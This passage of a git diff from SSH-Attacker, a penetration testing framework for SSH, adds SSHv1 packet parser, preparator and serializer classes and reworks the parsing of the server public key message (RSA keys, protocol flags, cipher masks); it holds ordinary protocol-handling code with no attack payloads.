Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.packet.parser; + +import de.rub.nds.modifiablevariable.util.ArrayConverter; +import de.rub.nds.sshattacker.core.constants.*; +import de.rub.nds.sshattacker.core.exceptions.CryptoException; +import de.rub.nds.sshattacker.core.packet.BinaryPacketSSHv1; +import de.rub.nds.sshattacker.core.packet.PacketCryptoComputations; +import de.rub.nds.sshattacker.core.packet.cipher.PacketChaCha20Poly1305Cipher; +import de.rub.nds.sshattacker.core.packet.cipher.PacketCipher; +import de.rub.nds.sshattacker.core.packet.cipher.PacketMacedCipher; +import java.io.InputStream; +import java.util.Arrays; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class BinaryPacketParserSSHv1 extends AbstractPacketParser { + + private static final Logger LOGGER = LogManager.getLogger(); + + private final PacketCipher activeDecryptCipher; + /** + * The sequence number of the packet to parse. Required to successfully decrypt the packet + * length in case of chacha20-poly1305. + */ + private final int sequenceNumber; + + /* + public BinaryPacketParser( + byte[] array, int startPosition, PacketCipher activeDecryptCipher, int sequenceNumber) { + super(array, startPosition); + this.activeDecryptCipher = activeDecryptCipher; + this.sequenceNumber = sequenceNumber; + } + */ + + public BinaryPacketParserSSHv1( + InputStream stream, PacketCipher activeDecryptCipher, int sequenceNumber) { + super(stream); + this.activeDecryptCipher = activeDecryptCipher; + this.sequenceNumber = sequenceNumber; + } + + // TODO Adding real parsing + @Override + public void parse(BinaryPacketSSHv1 binaryPacket) { + LOGGER.debug("Parsing BinaryPacket from serialized bytes:"); + try { + // BinaryPacket binaryPacket = new BinaryPacket(); + if (activeDecryptCipher.getEncryptionAlgorithm() + == EncryptionAlgorithm.CHACHA20_POLY1305_OPENSSH_COM) { + LOGGER.debug("Packet structure: ChaCha20-Poly1305"); + parseChaCha20Poly1305Packet(binaryPacket); + } else if (activeDecryptCipher.getEncryptionAlgorithm().getType() + == EncryptionAlgorithmType.AEAD) { + LOGGER.debug("Packet structure: AEAD"); + parseAEADPacket(binaryPacket); + } else if (activeDecryptCipher.isEncryptThenMac()) { + LOGGER.debug("Packet structure: Encrypt-then-MAC"); + parseETMPacket(binaryPacket); + } else { + LOGGER.debug("Packet structure: Encrypt-and-MAC"); + parseEAMPacket(binaryPacket); + } + LOGGER.debug("SET COMPLETE BYTES TO {}", getAlreadyParsed()); + binaryPacket.setCompletePacketBytes(getAlreadyParsed()); + + LOGGER.trace( + "Complete packet bytes: {}", + ArrayConverter.bytesToHexString( + binaryPacket.getCompletePacketBytes().getValue())); + LOGGER.debug("Packet length: {}", binaryPacket.getLength().getValue()); + if (activeDecryptCipher.getEncryptionAlgorithm() == EncryptionAlgorithm.NONE) { + LOGGER.debug( + "Packet bytes: {}", + ArrayConverter.bytesToHexString(binaryPacket.getCiphertext().getValue())); + } else { + LOGGER.debug( + "Encrypted packet bytes: {}", + ArrayConverter.bytesToHexString(binaryPacket.getCiphertext().getValue())); + } + + /* if (activeDecryptCipher.getEncryptionAlgorithm().getMode() == EncryptionMode.GCM) { + LOGGER.debug( + "Authentication tag: {}", + ArrayConverter.bytesToHexString(binaryPacket.getMac())); + } else { + if (binaryPacket.getMac().getValue().length > 0) { + LOGGER.debug("MAC: {}", ArrayConverter.bytesToHexString(binaryPacket.getMac())); + } else { + LOGGER.debug("MAC: [empty]"); + } + }*/ + // return binaryPacket; + } catch (CryptoException e) { + LOGGER.warn("Caught a CryptoException while parsing an encrypted binary packet", e); + // + // + // return null; + } + } + + private void parseAEADPacket(BinaryPacketSSHv1 binaryPacket) { + /* + * Encrypted AEAD packet structure: + * uint32 packet_length + * byte[n] ciphertext ; n = packet_length + * byte[m] auth_tag ; m = length of authentication tag + */ + binaryPacket.setLength(parseIntField(BinaryPacketConstants.LENGTH_FIELD_LENGTH)); + binaryPacket.setCiphertext(parseByteArrayField(binaryPacket.getLength().getValue())); + binaryPacket.setMac( + parseByteArrayField(activeDecryptCipher.getEncryptionAlgorithm().getAuthTagSize())); + } + + private void parseChaCha20Poly1305Packet(BinaryPacketSSHv1 binaryPacket) + throws CryptoException { + PacketChaCha20Poly1305Cipher activeDecryptCipher = + (PacketChaCha20Poly1305Cipher) this.activeDecryptCipher; + /* + * Encrypted ChaCha20Poly1305 packet structure: + * byte[4] encrypted_packet_length + * byte[n] ciphertext ; n = packet_length + * byte[16] mac + */ + byte[] encryptedPacketLength = + parseByteArrayField(BinaryPacketConstants.LENGTH_FIELD_LENGTH); + byte[] decryptedPacketLength = + activeDecryptCipher + .getHeaderCipher() + .decrypt( + encryptedPacketLength, + ArrayConverter.intToBytes( + this.sequenceNumber, DataFormatConstants.UINT64_SIZE)); + binaryPacket.setLength(ArrayConverter.bytesToInt(decryptedPacketLength)); + binaryPacket.setCiphertext( + ArrayConverter.concatenate( + encryptedPacketLength, + parseByteArrayField(binaryPacket.getLength().getValue()))); + binaryPacket.setMac( + parseByteArrayField(activeDecryptCipher.getEncryptionAlgorithm().getAuthTagSize())); + } + + private void parseETMPacket(BinaryPacketSSHv1 binaryPacket) { + /* + * Encrypted encrypt-then-mac packet structure: + * uint32 packet_length + * byte[n] ciphertext ; n = packet_length + * byte[m] mac ; m = length of mac output + */ + binaryPacket.setLength(parseIntField(BinaryPacketConstants.LENGTH_FIELD_LENGTH)); + binaryPacket.setCiphertext(parseByteArrayField(binaryPacket.getLength().getValue())); + binaryPacket.setMac( + parseByteArrayField(activeDecryptCipher.getMacAlgorithm().getOutputSize())); + } + + private void parseEAMPacket(BinaryPacketSSHv1 binaryPacket) throws CryptoException { + binaryPacket.prepareComputations(); + PacketCryptoComputations computations = binaryPacket.getComputations(); + // This cast is safe due to EAM being exclusively used with PacketMacedCipher + PacketMacedCipher activeDecryptCipher = (PacketMacedCipher) this.activeDecryptCipher; + /* + * Encrypted encrypt-and-mac packet structure: + * byte[n] ciphertext ; n = 4 + packet_length (decryption of first block required) + * byte[m] mac ; m = length of mac output + */ + // int pointer = getPointer(); + int blockSize = activeDecryptCipher.getEncryptionAlgorithm().getBlockSize(); + int decryptedByteCount = 0; + // Loop required for stream cipher support (effective block length is 1 in this case) + byte[] firstBlock = new byte[0]; + do { + byte[] block = parseByteArrayField(blockSize); + byte[] decryptedBlock; + if (activeDecryptCipher.getEncryptionAlgorithm().getIVSize() > 0) { + decryptedBlock = + activeDecryptCipher + .getCipher() + .decrypt(block, activeDecryptCipher.getNextIv()); + } else { + decryptedBlock = activeDecryptCipher.getCipher().decrypt(block); + } + firstBlock = ArrayConverter.concatenate(firstBlock, decryptedBlock); + decryptedByteCount += blockSize; + LOGGER.debug( + "LENGHT_FIELD_LENGHT = {} - DECRYPTED = {} - DECRYPTED_LENGHT = {}", + BinaryPacketConstants.LENGTH_FIELD_LENGTH, + firstBlock, + firstBlock.length); + } while (decryptedByteCount < BinaryPacketConstants.LENGTH_FIELD_LENGTH); + // setPointer(pointer); + LOGGER.debug("DONE WITH PARSING LENGHT"); + computations.setPlainPacketBytes(firstBlock, true); + + binaryPacket.setLength( + ArrayConverter.bytesToInt( + Arrays.copyOfRange( + firstBlock, 0, BinaryPacketConstants.LENGTH_FIELD_LENGTH))); + + int paddingLenght = 8 - (binaryPacket.getLength().getValue() % 8); + + binaryPacket.setCiphertext( + parseByteArrayField(paddingLenght + binaryPacket.getLength().getValue())); + /* binaryPacket.setMac( + parseByteArrayField(activeDecryptCipher.getMacAlgorithm().getOutputSize()));*/ + LOGGER.debug("DONE WITH PARSING parseEAMPacket "); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/preparator/BinaryPacketPreparatorSSHv1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/preparator/BinaryPacketPreparatorSSHv1.java new file mode 100644 index 000000000..11b86ef6f --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/preparator/BinaryPacketPreparatorSSHv1.java @@ -0,0 +1,45 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.packet.preparator; + +import de.rub.nds.sshattacker.core.packet.BinaryPacketSSHv1; +import de.rub.nds.sshattacker.core.packet.compressor.PacketCompressor; +import de.rub.nds.sshattacker.core.packet.crypto.AbstractPacketEncryptor; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class BinaryPacketPreparatorSSHv1 extends AbstractPacketPreparator { + + private static final Logger LOGGER = LogManager.getLogger(); + + private final BinaryPacketSSHv1 binaryPacket; + private final AbstractPacketEncryptor encryptor; + private final PacketCompressor compressor; + + public BinaryPacketPreparatorSSHv1( + Chooser chooser, + BinaryPacketSSHv1 binaryPacket, + AbstractPacketEncryptor encryptor, + PacketCompressor compressor) { + super(chooser, binaryPacket); + this.binaryPacket = binaryPacket; + this.encryptor = encryptor; + this.compressor = compressor; + } + + @Override + public void prepare() { + LOGGER.debug("Preparing binary packet computations"); + binaryPacket.prepareComputations(); + LOGGER.debug("Compressing binary packet"); + compressor.compress(binaryPacket); + LOGGER.debug("Encrypting binary packet"); + encryptor.encrypt(binaryPacket); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/serializer/BinaryPacketSerializerSSHv1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/serializer/BinaryPacketSerializerSSHv1.java new file mode 100644 index 000000000..b166a63e1 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/serializer/BinaryPacketSerializerSSHv1.java @@ -0,0 +1,68 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.packet.serializer; + +import de.rub.nds.modifiablevariable.util.ArrayConverter; +import de.rub.nds.sshattacker.core.constants.BinaryPacketConstants; +import de.rub.nds.sshattacker.core.constants.BinaryPacketField; +import de.rub.nds.sshattacker.core.packet.BinaryPacketSSHv1; +import java.util.Set; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class BinaryPacketSerializerSSHv1 extends AbstractPacketSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + + private final BinaryPacketSSHv1 binaryPacket; + + public BinaryPacketSerializerSSHv1(BinaryPacketSSHv1 binaryPacket) { + this.binaryPacket = binaryPacket; + } + + @Override + protected byte[] serializeBytes() { + LOGGER.debug("Serializing BinaryPacket to bytes:"); + + Set encryptedFields = + binaryPacket.getComputations().getEncryptedPacketFields(); + if (!encryptedFields.contains(BinaryPacketField.PACKET_LENGTH)) { + appendInt( + binaryPacket.getLength().getValue(), BinaryPacketConstants.LENGTH_FIELD_LENGTH); + LOGGER.debug("Packet length: {}", binaryPacket.getLength().getValue()); + } + if (!encryptedFields.contains(BinaryPacketField.PADDING)) { + appendBytes(binaryPacket.getPadding().getValue()); + LOGGER.debug( + "Padding: {}", + ArrayConverter.bytesToHexString(binaryPacket.getPadding().getValue())); + } + /* if (!encryptedFields.contains(BinaryPacketField.PADDING_LENGTH)) { + appendByte(binaryPacket.getPaddingLength().getValue()); + LOGGER.debug("Padding length: {}", binaryPacket.getPaddingLength().getValue()); + }*/ + appendBytes(binaryPacket.getCiphertext().getValue()); + LOGGER.debug( + "Ciphertext: {}", + ArrayConverter.bytesToHexString(binaryPacket.getCiphertext().getValue())); + + /*appendBytes(binaryPacket.getMac().getValue()); + LOGGER.debug( + "MAC / Authentication tag: {}", + ArrayConverter.bytesToHexString(binaryPacket.getMac().getValue()));*/ + + binaryPacket.setCompletePacketBytes(getAlreadySerialized()); + LOGGER.debug( + "Complete packet bytes: {}", + ArrayConverter.bytesToHexString(binaryPacket.getCompletePacketBytes().getValue())); + LOGGER.debug( + "Complete Packet is {} Byte long", + binaryPacket.getCompletePacketBytes().getValue().length); + return getAlreadySerialized(); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ServerPublicKeyMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ServerPublicKeyMessageHandler.java index af2ede213..a962f236a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ServerPublicKeyMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ServerPublicKeyMessageHandler.java @@ -7,11 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.ssh1.handler; -import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; -import de.rub.nds.sshattacker.core.protocol.util.KeyExchangeUtil; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -30,21 +28,24 @@ public ServerPublicKeyMessageHandler(SshContext context) { @Override public void adjustContext(ServerPublicKeyMessage message) { + // KeyExchangeUtil.handleHostKeyMessage(sshContext, message); - setRemoteValues(message); - sshContext.getChooser().getHybridKeyExchange().combineSharedSecrets(); + // setRemoteValues(message); + /* sshContext.getChooser().getHybridKeyExchange().combineSharedSecrets(); sshContext.setSharedSecret( sshContext.getChooser().getHybridKeyExchange().getSharedSecret()); sshContext .getExchangeHashInputHolder() .setSharedSecret(sshContext.getChooser().getHybridKeyExchange().getSharedSecret()); KeyExchangeUtil.computeExchangeHash(sshContext); + */ /* KeyExchangeUtil.handleExchangeHashSignatureMessage(sshContext, message);*/ + /* KeyExchangeUtil.setSessionId(sshContext); - KeyExchangeUtil.generateKeySet(sshContext); + KeyExchangeUtil.generateKeySet(sshContext);*/ } - private void setRemoteValues(ServerPublicKeyMessage message) { + /*private void setRemoteValues(ServerPublicKeyMessage message) { sshContext .getChooser() .getHybridKeyExchange() @@ -85,7 +86,7 @@ private void setRemoteValues(ServerPublicKeyMessage message) { + " is not supported."); break; } - } + }*/ /*@Override public SshMessageParser getParser(byte[] array) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ServerPublicKeyMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ServerPublicKeyMessage.java index d91fb9c05..4dfebcef8 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ServerPublicKeyMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ServerPublicKeyMessage.java @@ -10,6 +10,8 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.sshattacker.core.constants.AuthenticationMethodSSHv1; +import de.rub.nds.sshattacker.core.constants.CipherMethod; import de.rub.nds.sshattacker.core.crypto.kex.HybridKeyExchange; import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; @@ -24,89 +26,57 @@ import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.ServerPublicKeyMessagePreparator; import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.ServerPublicKeyMessageSerializer; import java.io.InputStream; +import java.util.List; public class ServerPublicKeyMessage extends SshMessage { - public ModifiableByteArray getAntiSpoofingCookie() { - return antiSpoofingCookie; - } - - public void setAntiSpoofingCookie(ModifiableByteArray antiSpoofingCookie) { - this.antiSpoofingCookie = antiSpoofingCookie; - } + // ServerKey + private SshPublicKey serverKey; + private ModifiableInteger serverKeyByteLength; + private ModifiableByteArray serverPublicExponent; + private ModifiableByteArray serverPublicModulus; - public void setAntiSpoofingCookie(byte[] antiSpoofingCookie) { - this.antiSpoofingCookie = - ModifiableVariableFactory.safelySetValue( - this.antiSpoofingCookie, antiSpoofingCookie); - } + private ModifiableByteArray serverKeyBytes; + // Host Key private SshPublicKey hostKey; + private ModifiableInteger hostKeyByteLenght; + private ModifiableByteArray hostPublicExponent; + private ModifiableByteArray hostPublicModulus; + private ModifiableByteArray hostKeyBytes; - public void setHostKey(SshPublicKey hostKey) { - this.hostKey = hostKey; - } - - public SshPublicKey getServerKey() { - return serverKey; - } - - public void setServerKey(SshPublicKey serverKey) { - this.serverKey = serverKey; - // this.serverPublicExponent = serverKey.getPublicKey().getPublicExponent().byteValue(); - // //toModifiableByteArry.... - // this.serverPublicModulus = serverKey.getPublicKey().getModulus().byteValue(); - // //toModifiableByteArry... - } - - private SshPublicKey serverKey; - - // *SSHV1*// + // Other Values private ModifiableByteArray antiSpoofingCookie; - private ModifiableInteger serverKeyByteLength; - public ModifiableByteArray getServerPublicExponent() { - return serverPublicExponent; - } + private ModifiableByteArray protocolFlags; - public void setServerPublicExponent(ModifiableByteArray serverPublicExponent) { - this.serverPublicExponent = serverPublicExponent; - } + private ModifiableInteger cipherMask; + private ModifiableInteger authMask; - public void setServerPublicExponent(byte[] serverPublicExponent) { - this.serverPublicExponent = - ModifiableVariableFactory.safelySetValue( - this.serverPublicExponent, serverPublicExponent); - } + private List supportedCipherMethods; - public ModifiableByteArray getServerPublicModulus() { - return serverPublicModulus; + private List supportedAuthenticationMethods; + + public ModifiableByteArray getServerKeyBytes() { + return serverKeyBytes; } - public void setServerPublicModulus(ModifiableByteArray serverPublicModulus) { - this.serverPublicModulus = serverPublicModulus; + public void setAntiSpoofingCookie(ModifiableByteArray antiSpoofingCookie) { + this.antiSpoofingCookie = antiSpoofingCookie; } - public void setServerPublicModulus(byte[] serverPublicModulus) { - this.serverPublicModulus = + public void setAntiSpoofingCookie(byte[] antiSpoofingCookie) { + this.antiSpoofingCookie = ModifiableVariableFactory.safelySetValue( - this.serverPublicModulus, serverPublicModulus); + this.antiSpoofingCookie, antiSpoofingCookie); } - private ModifiableByteArray serverPublicExponent; - private ModifiableByteArray serverPublicModulus; - - public ModifiableInteger getServerKeyByteLength() { - return serverKeyByteLength; + public SshPublicKey getHostKey() { + return hostKey; } - public void setServerKeyByteLength(ModifiableInteger serverKeyByteLength) { - this.serverKeyByteLength = serverKeyByteLength; - } - - public void setServerKeyByteLenght(int serverKeyBits) { - this.serverKeyByteLength = - ModifiableVariableFactory.safelySetValue(this.serverKeyByteLength, serverKeyBits); + public void setHostKey(SshPublicKey hostKey) { + this.hostKey = hostKey; } public ModifiableInteger getHostKeyByteLenght() { @@ -122,8 +92,6 @@ public void setHostKeyByteLenght(int hostKeyBits) { ModifiableVariableFactory.safelySetValue(this.hostKeyByteLenght, hostKeyBits); } - private ModifiableInteger hostKeyByteLenght; - public ModifiableByteArray getHostPublicExponent() { return hostPublicExponent; } @@ -151,13 +119,6 @@ public void setHostPublicModulus(byte[] publicModulus) { ModifiableVariableFactory.safelySetValue(this.hostPublicModulus, publicModulus); } - private ModifiableByteArray hostPublicExponent; - private ModifiableByteArray hostPublicModulus; - private ModifiableInteger protocolFlags; - private ModifiableInteger cipherMask; - private ModifiableInteger authMask; - // *SSHV1*// - public ModifiableByteArray getHostKeyBytes() { return hostKeyBytes; } @@ -171,14 +132,16 @@ public void setHostKeyBytes(byte[] hostKeyBytes) { ModifiableVariableFactory.safelySetValue(this.hostKeyBytes, hostKeyBytes); } - private ModifiableByteArray hostKeyBytes; - - public ModifiableByteArray getServerKeyBytes() { - return serverKeyBytes; + public SshPublicKey getServerKey() { + return serverKey; } - public void setServerKeyBytes(ModifiableByteArray serverKeyBytes) { - this.serverKeyBytes = serverKeyBytes; + public void setServerKey(SshPublicKey serverKey) { + this.serverKey = serverKey; + // this.serverPublicExponent = serverKey.getPublicKey().getPublicExponent().byteValue(); + // //toModifiableByteArry.... + // this.serverPublicModulus = serverKey.getPublicKey().getModulus().byteValue(); + // //toModifiableByteArry... } public void setServerKeyBytes(byte[] serverKeyBytes) { @@ -187,101 +150,114 @@ public void setServerKeyBytes(byte[] serverKeyBytes) { ; } - private ModifiableByteArray serverKeyBytes; + public ModifiableByteArray getAntiSpoofingCookie() { + return antiSpoofingCookie; + } - private ModifiableInteger publicKeyLength; - private ModifiableByteArray publicKey; + // *SSHV1*// + + public ModifiableByteArray getServerPublicExponent() { + return serverPublicExponent; + } + + public void setServerPublicExponent(ModifiableByteArray serverPublicExponent) { + this.serverPublicExponent = serverPublicExponent; + } - private ModifiableInteger combinedKeyShareLength; - private ModifiableByteArray combinedKeyShare; + public void setServerPublicExponent(byte[] serverPublicExponent) { + this.serverPublicExponent = + ModifiableVariableFactory.safelySetValue( + this.serverPublicExponent, serverPublicExponent); + } - private ModifiableInteger signatureLength; - private ModifiableByteArray signature; + public ModifiableByteArray getServerPublicModulus() { + return serverPublicModulus; + } - public ModifiableInteger getPublicKeyLength() { - return publicKeyLength; + public void setServerPublicModulus(ModifiableByteArray serverPublicModulus) { + this.serverPublicModulus = serverPublicModulus; } - public void setPublicKeyLength(ModifiableInteger publicKeyLength) { - this.publicKeyLength = publicKeyLength; + public void setServerPublicModulus(byte[] serverPublicModulus) { + this.serverPublicModulus = + ModifiableVariableFactory.safelySetValue( + this.serverPublicModulus, serverPublicModulus); } - public void setPublicKeyLength(int publicKeyLength) { - this.publicKeyLength = - ModifiableVariableFactory.safelySetValue(this.publicKeyLength, publicKeyLength); + public ModifiableInteger getServerKeyByteLength() { + return serverKeyByteLength; } - public ModifiableByteArray getPublicKey() { - return publicKey; + public void setServerKeyByteLength(ModifiableInteger serverKeyByteLength) { + this.serverKeyByteLength = serverKeyByteLength; } - public void setPublicKey(byte[] publicKey) { - setPublicKey(publicKey, false); + public void setServerKeyByteLenght(int serverKeyBits) { + this.serverKeyByteLength = + ModifiableVariableFactory.safelySetValue(this.serverKeyByteLength, serverKeyBits); } - public void setPublicKey(ModifiableByteArray publicKey, boolean adjustLengthField) { - this.publicKey = publicKey; - if (adjustLengthField) { - setPublicKeyLength(this.publicKey.getValue().length); - } + public ModifiableByteArray getProtocolFlags() { + return protocolFlags; } - public void setPublicKey(byte[] publicKey, boolean adjustLengthField) { - this.publicKey = ModifiableVariableFactory.safelySetValue(this.publicKey, publicKey); - if (adjustLengthField) { - setPublicKeyLength(this.publicKey.getValue().length); - } + public void setProtocolFlags(ModifiableByteArray protocolFlags) { + this.protocolFlags = protocolFlags; } - public ModifiableInteger getCombinedKeyShareLength() { - return combinedKeyShareLength; + public void setProtocolFlags(byte[] protocolFlags) { + this.protocolFlags = + ModifiableVariableFactory.safelySetValue(this.protocolFlags, protocolFlags); } - public void setCombinedKeyShareLength(ModifiableInteger combinedKeyShareLength) { - this.combinedKeyShareLength = combinedKeyShareLength; + public ModifiableInteger getCipherMask() { + return cipherMask; } - public void setCiphertextLength(int ciphertextLength) { - this.combinedKeyShareLength = - ModifiableVariableFactory.safelySetValue( - this.combinedKeyShareLength, ciphertextLength); + public void setCipherMask(ModifiableInteger cipherMask) { + this.cipherMask = cipherMask; + } + + public void setCipherMask(int cipherMask) { + this.cipherMask = ModifiableVariableFactory.safelySetValue(this.cipherMask, cipherMask); + } + + public ModifiableInteger getAuthMask() { + return authMask; + } + + public void setAuthMask(ModifiableInteger authMask) { + this.authMask = authMask; + } + + public void setAuthMask(int authMask) { + this.authMask = ModifiableVariableFactory.safelySetValue(this.authMask, authMask); } - public ModifiableByteArray getCombinedKeyShare() { - return combinedKeyShare; + public List getSupportedCipherMethods() { + return supportedCipherMethods; } - public void setCombinedKeyShare(byte[] combinedKeyShare) { - setCiphertext(combinedKeyShare, false); + public void setSupportedCipherMethods(List supportedCipherMethods) { + this.supportedCipherMethods = supportedCipherMethods; } - public void setCiphertext(ModifiableByteArray ciphertext, boolean adjustLengthField) { - this.combinedKeyShare = ciphertext; - if (adjustLengthField) { - setCiphertextLength(this.combinedKeyShare.getValue().length); - } + public List getSupportedAuthenticationMethods() { + return supportedAuthenticationMethods; } - public void setCiphertext(byte[] ciphertext, boolean adjustLengthField) { - this.combinedKeyShare = - ModifiableVariableFactory.safelySetValue(this.combinedKeyShare, ciphertext); - if (adjustLengthField) { - setCiphertextLength(this.combinedKeyShare.getValue().length); - } + public void setSupportedAuthenticationMethods( + List supportedAuthenticationMethods) { + this.supportedAuthenticationMethods = supportedAuthenticationMethods; } + private ModifiableInteger publicKeyLength; + @Override public ServerPublicKeyMessageHandler getHandler(SshContext context) { return new ServerPublicKeyMessageHandler(context); } - /*@Override - public SshMessageParser getParser(SshContext context, InputStream stream) { - HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); - return new HybridKeyExchangeReplyMessageParser( - array, kex.getCombiner(), kex.getPkAgreementLength(), kex.getCiphertextLength()); - }*/ - @Override public SshMessageParser getParser( SshContext context, InputStream stream) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ServerPublicKeyMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ServerPublicKeyMessageParser.java index fa2b2d215..6bcb65588 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ServerPublicKeyMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ServerPublicKeyMessageParser.java @@ -8,12 +8,20 @@ package de.rub.nds.sshattacker.core.protocol.ssh1.parser; import de.rub.nds.modifiablevariable.util.ArrayConverter; -import de.rub.nds.sshattacker.core.constants.BinaryPacketConstants; +import de.rub.nds.sshattacker.core.constants.AuthenticationMethodSSHv1; +import de.rub.nds.sshattacker.core.constants.CipherMethod; import de.rub.nds.sshattacker.core.constants.HybridKeyExchangeCombiner; +import de.rub.nds.sshattacker.core.constants.PublicKeyFormat; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; +import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; import java.io.InputStream; +import java.math.BigInteger; +import java.util.ArrayList; +import java.util.List; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -92,21 +100,57 @@ public ServerPublicKeyMessageParser(SshContext context, InputStream stream) { } private void parseHostKeyBytes(ServerPublicKeyMessage message) { - message.setHostKeyByteLenght(parseIntField(BinaryPacketConstants.LENGTH_FIELD_LENGTH)); + + int hostKeyBits = parseIntField(4); + BigInteger exponent = parseMultiprecision(); + BigInteger modulus = parseMultiprecision(); + CustomRsaPublicKey publicKey = new CustomRsaPublicKey(exponent, modulus); + message.setHostKey( + new SshPublicKey( + PublicKeyFormat.SSH_RSA, publicKey)); + + LOGGER.debug( + "Added Public Host Exponent with value {}", + ArrayConverter.bytesToHexString( + message.getHostKey().getPublicKey().getPublicExponent().toByteArray())); + + LOGGER.debug( + "Added Public Host Modulus with value {}", + ArrayConverter.bytesToHexString( + message.getHostKey().getPublicKey().getModulus().toByteArray())); + /* message.setHostKeyByteLenght(parseIntField(BinaryPacketConstants.LENGTH_FIELD_LENGTH)); LOGGER.debug("Host key byte length" + message.getHostKeyByteLenght().getValue()); message.setHostKeyBytes(parseByteArrayField(message.getHostKeyByteLenght().getValue())); LOGGER.debug( "Host key bytes: " - + ArrayConverter.bytesToHexString(message.getHostKeyBytes().getValue())); + + ArrayConverter.bytesToHexString(message.getHostKeyBytes().getValue()));*/ } private void parseServerKeyBytes(ServerPublicKeyMessage message) { - message.setServerKeyByteLenght(parseIntField(BinaryPacketConstants.LENGTH_FIELD_LENGTH)); + + int serverKeyBits = parseIntField(4); + BigInteger exponent = parseMultiprecision(); + BigInteger modulus = parseMultiprecision(); + CustomRsaPublicKey publicKey = new CustomRsaPublicKey(exponent, modulus); + message.setServerKey( + new SshPublicKey( + PublicKeyFormat.SSH_RSA, publicKey)); + + LOGGER.debug( + "Added Public Host Exponent with value {}", + ArrayConverter.bytesToHexString( + message.getServerKey().getPublicKey().getPublicExponent().toByteArray())); + + LOGGER.debug( + "Added Public Host Modulus with value {}", + ArrayConverter.bytesToHexString( + message.getServerKey().getPublicKey().getModulus().toByteArray())); + /* message.setServerKeyByteLenght(parseIntField(BinaryPacketConstants.LENGTH_FIELD_LENGTH)); LOGGER.debug("Server key byte length" + message.getServerKeyByteLength().getValue()); message.setServerKeyBytes(parseByteArrayField(message.getServerKeyByteLength().getValue())); LOGGER.debug( "Server key bytes: " - + ArrayConverter.bytesToHexString(message.getServerKeyBytes().getValue())); + + ArrayConverter.bytesToHexString(message.getServerKeyBytes().getValue()));*/ } private void parseAntiSpoofingCookie(ServerPublicKeyMessage message) { @@ -114,7 +158,58 @@ private void parseAntiSpoofingCookie(ServerPublicKeyMessage message) { LOGGER.debug("AntiSpoofingCookie: {}", message.getAntiSpoofingCookie().getValue()); } - private void parseHybridKey(ServerPublicKeyMessage message) { + private void parseProtocolFlags(ServerPublicKeyMessage message) { + message.setProtocolFlags(parseByteArrayField(4)); + LOGGER.debug("Protocol Flags: {}", message.getProtocolFlags().getValue()); + } + + private void parseCipherMask(ServerPublicKeyMessage message) { + message.setCipherMask(parseIntField(4)); + LOGGER.debug( + "CipherMask: {}", 